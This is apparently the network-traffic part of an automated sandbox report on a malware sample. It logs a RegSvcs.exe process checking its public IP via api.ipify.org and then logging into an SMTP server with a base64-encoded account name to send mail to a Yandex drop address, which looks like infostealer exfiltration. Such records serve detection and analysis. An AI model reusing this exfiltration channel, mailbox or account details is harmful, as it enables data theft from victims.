                              Jul 1, 2024 20:29:07.481699944 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.481749058 CEST49752587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:07.481825113 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.481872082 CEST49752587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:07.481884003 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.481913090 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.481923103 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.481964111 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482069016 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482403994 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482414961 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482424021 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482435942 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482542992 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482553005 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482563019 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.482976913 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486555099 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486573935 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486622095 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486637115 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486654997 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486666918 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486692905 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486702919 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486713886 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486788988 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486798048 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486805916 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486871004 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486881018 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486969948 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486979008 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486987114 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.486996889 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:07.487008095 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:08.091321945 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:08.160341024 CEST49752587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:09.642345905 CEST49752587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:09.647418022 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.034501076 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.034619093 CEST49752587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:10.035824060 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:10.036031008 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.036086082 CEST49752587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:10.039959908 CEST5874975279.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.042540073 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.042603016 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:10.628614902 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.628832102 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:10.636104107 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.815536022 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:10.815969944 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:10.820924997 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.001250029 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.001467943 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.007335901 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.188497066 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.188714981 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.193587065 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.372123957 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.372385025 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.380682945 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.614816904 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.614967108 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.619858027 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.831549883 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.831835985 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.831875086 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.831914902 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.831952095 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.833321095 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.836924076 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.836998940 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.837009907 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.837019920 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.837066889 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838392019 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838411093 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838445902 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838466883 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838490009 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838500023 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838536024 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838547945 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838561058 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838597059 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838606119 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838614941 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838624001 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.838643074 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838664055 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.838959932 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.839025021 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.842178106 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.842245102 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.843830109 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.843885899 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.843909979 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.843947887 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.843962908 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844013929 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.844114065 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844124079 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844158888 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.844177961 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.844187021 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844197035 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844225883 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844232082 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.844244003 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.844271898 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.844355106 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844397068 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.844568968 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.844609022 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.849461079 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.849471092 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.849540949 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.850290060 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850298882 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850306988 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850364923 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:11.850430965 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850440979 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850449085 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850456953 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850466013 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850474119 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850765944 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850775003 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850783110 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850791931 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.850800991 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.851460934 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.851469994 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.851479053 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.851486921 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855060101 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855072021 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855079889 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855087996 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855199099 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855207920 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855216026 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855223894 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855834961 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855863094 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855979919 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855989933 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.855998039 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.856101036 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.856111050 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.856118917 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.856127024 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.856137037 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:11.856493950 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:12.636617899 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:12.691620111 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:18.418917894 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:18.423979998 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:18.807950974 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:18.809669018 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:18.809766054 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:18.810102940 CEST49753587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:18.811129093 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:18.814838886 CEST5874975379.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:18.816231966 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:18.816425085 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:19.414141893 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:19.418207884 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:19.423173904 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:19.606580973 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:19.607073069 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:19.611912966 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:19.806065083 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:19.806261063 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:19.811249018 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:19.999017000 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:19.999155045 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.005079985 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.188519955 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.188666105 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.193471909 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.392357111 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.395040035 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.401407003 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.583072901 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.586976051 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.587012053 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.587012053 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.588264942 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.588264942 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.592144012 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.592154980 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.592163086 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.592252970 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.593118906 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.593396902 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.593493938 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.593503952 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.593508005 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.593528032 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.593661070 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.598365068 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.598612070 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.598655939 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.598762035 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.598798990 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.598822117 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.598835945 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.598845959 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.598928928 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.598968983 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.599071980 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.599528074 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.599612951 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.603678942 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.603971958 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.604115009 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:20.604160070 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.604168892 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.604263067 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.604542971 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.604603052 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.604614973 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.605297089 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.608975887 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.608985901 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609070063 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609081030 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609088898 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609098911 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609118938 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609127998 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609137058 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609141111 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609152079 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609160900 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609250069 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609270096 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609358072 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609368086 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609409094 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609419107 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609648943 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609659910 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:20.609762907 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:21.193829060 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:21.238477945 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:24.612020969 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:24.617010117 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.021388054 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.021658897 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.021791935 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:25.021887064 CEST49754587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:25.022111893 CEST49755587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:25.026698112 CEST5874975479.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.026998997 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.027156115 CEST49755587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:25.655849934 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.656055927 CEST49755587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:25.660914898 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.840574980 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:25.842904091 CEST49755587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:25.847671032 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:26.043775082 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:26.046910048 CEST49755587192.168.2.479.170.44.32
                              Jul 1, 2024 20:29:26.051898956 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:26.234744072 CEST5874975579.170.44.32192.168.2.4
                              Jul 1, 2024 20:29:26.285355091 CEST49755587192.168.2.479.170.44.32
                              TimestampSource PortDest PortSource IPDest IP
                              Jul 1, 2024 20:25:18.406722069 CEST6137953192.168.2.41.1.1.1
                              Jul 1, 2024 20:25:18.414134026 CEST53613791.1.1.1192.168.2.4
                              Jul 1, 2024 20:25:19.686779022 CEST5112553192.168.2.41.1.1.1
                              Jul 1, 2024 20:25:19.752358913 CEST53511251.1.1.1192.168.2.4
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jul 1, 2024 20:25:18.406722069 CEST192.168.2.41.1.1.10x1738Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                              Jul 1, 2024 20:25:19.686779022 CEST192.168.2.41.1.1.10x1f71Standard query (0)mail.fasmacopy.grA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jul 1, 2024 20:25:18.414134026 CEST1.1.1.1192.168.2.40x1738No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                              Jul 1, 2024 20:25:18.414134026 CEST1.1.1.1192.168.2.40x1738No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                              Jul 1, 2024 20:25:18.414134026 CEST1.1.1.1192.168.2.40x1738No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                              Jul 1, 2024 20:25:19.752358913 CEST1.1.1.1192.168.2.40x1f71No error (0)mail.fasmacopy.gr79.170.44.32A (IP address)IN (0x0001)false
                              • api.ipify.org
                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.449730104.26.12.2054437516C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                              TimestampBytes transferredDirectionData
                              2024-07-01 18:25:18 UTC155OUTGET / HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                              Host: api.ipify.org
                              Connection: Keep-Alive
                              2024-07-01 18:25:19 UTC211INHTTP/1.1 200 OK
                              Date: Mon, 01 Jul 2024 18:25:19 GMT
                              Content-Type: text/plain
                              Content-Length: 11
                              Connection: close
                              Vary: Origin
                              CF-Cache-Status: DYNAMIC
                              Server: cloudflare
                              CF-RAY: 89c8701dd81a9e05-EWR
                              2024-07-01 18:25:19 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                              Data Ascii: 8.46.123.33


                              TimestampSource PortDest PortSource IPDest IPCommands
                              Jul 1, 2024 20:25:20.732445955 CEST5874973179.170.44.32192.168.2.4220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:25:20 +0100
                              Jul 1, 2024 20:25:20.732642889 CEST49731587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:25:20.920974970 CEST5874973179.170.44.32192.168.2.4250-mta2.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:25:20.922017097 CEST49731587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:25:21.109067917 CEST5874973179.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:25:21.301157951 CEST5874973179.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:25:21.301393032 CEST49731587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:25:21.488816977 CEST5874973179.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:25:21.488975048 CEST49731587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:25:21.833760023 CEST5874973179.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:25:21.833945036 CEST49731587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:25:22.036159039 CEST5874973179.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:25:22.036964893 CEST49731587192.168.2.479.170.44.32.
                              Jul 1, 2024 20:25:22.453134060 CEST5874973179.170.44.32192.168.2.4250 OK id=1sOLiL-0000000DBQV-3ysM
                              Jul 1, 2024 20:26:59.707380056 CEST49731587192.168.2.479.170.44.32QUIT
                              Jul 1, 2024 20:27:00.096755981 CEST5874973179.170.44.32192.168.2.4221 mta2.hi.local closing connection
                              Jul 1, 2024 20:27:09.308615923 CEST5874973979.170.44.32192.168.2.4220 mta2.hi.local ESMTP Exim 4.97.1 Mon, 01 Jul 2024 19:27:09 +0100
                              Jul 1, 2024 20:27:09.308748960 CEST49739587192.168.2.479.170.44.32EHLO 579569
                              Jul 1, 2024 20:27:09.495465040 CEST5874973979.170.44.32192.168.2.4250-mta2.hi.local Hello 579569 [8.46.123.33]
                              250-SIZE 52428800
                              250-8BITMIME
                              250-PIPELINING
                              250-PIPECONNECT
                              250-AUTH PLAIN LOGIN
                              250-CHUNKING
                              250-STARTTLS
                              250 HELP
                              Jul 1, 2024 20:27:09.495635986 CEST49739587192.168.2.479.170.44.32AUTH login aW5mb0BmYXNtYWNvcHkuZ3I=
                              Jul 1, 2024 20:27:09.684573889 CEST5874973979.170.44.32192.168.2.4334 UGFzc3dvcmQ6
                              Jul 1, 2024 20:27:09.876250029 CEST5874973979.170.44.32192.168.2.4235 Authentication succeeded
                              Jul 1, 2024 20:27:09.876403093 CEST49739587192.168.2.479.170.44.32MAIL FROM:<info@fasmacopy.gr>
                              Jul 1, 2024 20:27:10.065507889 CEST5874973979.170.44.32192.168.2.4250 OK
                              Jul 1, 2024 20:27:10.073518038 CEST49739587192.168.2.479.170.44.32RCPT TO:<info.superseal@yandex.com>
                              Jul 1, 2024 20:27:10.270013094 CEST5874973979.170.44.32192.168.2.4250 Accepted
                              Jul 1, 2024 20:27:10.277075052 CEST49739587192.168.2.479.170.44.32DATA
                              Jul 1, 2024 20:27:10.463644028 CEST5874973979.170.44.32192.168.2.4354 Enter message, ending with "." on a line by itself
                              Jul 1, 2024 20:27:10.493001938 CEST49739587192.168.2.479.170.44.32.
                              Jul 1, 2024 20:27:11.276200056 CEST5874973979.170.44.32192.168.2.4250 OK id=1sOLk6-0000000DCGR-1aE4
                              Jul 1, 2024 20:27:12.314333916 CEST5874973979.170.44.32192.168.2.4250 OK id=1sOLk6-0000000DCGR-1aE4
                              Jul 1, 2024 20:27:12.315871000 CEST5874973979.170.44.32192.168.2.4250 OK id=1sOLk6-0000000DCGR-1aE4
                              Jul 1, 2024 20:27:12.316076040 CEST5874973979.170.44.32192.168.2.4250 OK id=1sOLk6-0000000DCGR-1aE4
